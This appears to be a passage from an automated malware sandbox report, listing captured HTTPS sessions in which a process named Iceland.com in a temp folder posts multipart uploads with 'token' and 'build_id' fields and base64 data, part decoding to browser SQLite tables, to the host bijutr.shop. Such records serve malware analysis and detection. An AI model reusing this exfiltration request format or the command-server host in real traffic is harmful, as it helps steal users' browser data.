                                                                                                                                                                                                                                                              2024-12-27 06:10:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:00 UTC16355OUTData Raw: 55 67 51 6b 39 50 54 45 56 42 54 69 42 45 52 55 5a 42 56 55 78 55 49 45 5a 42 54 46 4e 46 49 45 35 50 56 43 42 4f 56 55 78 4d 4b 56 41 45 42 68 63 72 4b 77 46 5a 64 47 46 69 62 47 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 46 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 4e 78 62 47 6c 30 5a 56 39 7a 5a 58 46 31 5a 57 35 6a 5a 53 68 75 59 57 31 6c 4c 48 4e 6c 63 53 6d 42 66 77 4d 48 46 78 55 56 41 59 4e 68 64 47 46 69 62 47 56 31 63 6d 78 7a 64 58 4a 73 63 77 52 44 55 6b 56 42 56 45 55 67 56 45 46 43 54 45 55 67 64 58 4a 73 63 79 68 70 5a 43 42 4a 54 6c 52 46 52 30 56 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 49 45 46 56 56 45 39 4a 54 6b 4e 53 52 55 31 46 54
                                                                                                                                                                                                                                                              Data Ascii: UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2VzcWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNhdGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT
                                                                                                                                                                                                                                                              2024-12-27 06:10:02 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:02 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              17192.168.2.449772188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:10:01 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----PHVAI5F3EKF37QQQI5XL
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 66001
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:10:01 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 50 48 56 41 49 35 46 33 45 4b 46 33 37 51 51 51 49 35 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 50 48 56 41 49 35 46 33 45 4b 46 33 37 51 51 51 49 35 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 50 48 56 41 49 35 46 33 45 4b 46 33 37 51 51 51 49 35 58 4c 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------PHVAI5F3EKF37QQQI5XLContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------PHVAI5F3EKF37QQQI5XLContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------PHVAI5F3EKF37QQQI5XLCont
                                                                                                                                                                                                                                                              2024-12-27 06:10:01 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:01 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:01 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:01 UTC581OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:03 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:10:03 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              18192.168.2.449782188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:10:04 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----CJW47QI5FCBAIMGLN7YU
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 153381
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:10:04 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 43 4a 57 34 37 51 49 35 46 43 42 41 49 4d 47 4c 4e 37 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 43 4a 57 34 37 51 49 35 46 43 42 41 49 4d 47 4c 4e 37 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 43 4a 57 34 37 51 49 35 46 43 42 41 49 4d 47 4c 4e 37 59 55 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------CJW47QI5FCBAIMGLN7YUContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------CJW47QI5FCBAIMGLN7YUContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------CJW47QI5FCBAIMGLN7YUCont
                                                                                                                                                                                                                                                              2024-12-27 06:10:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
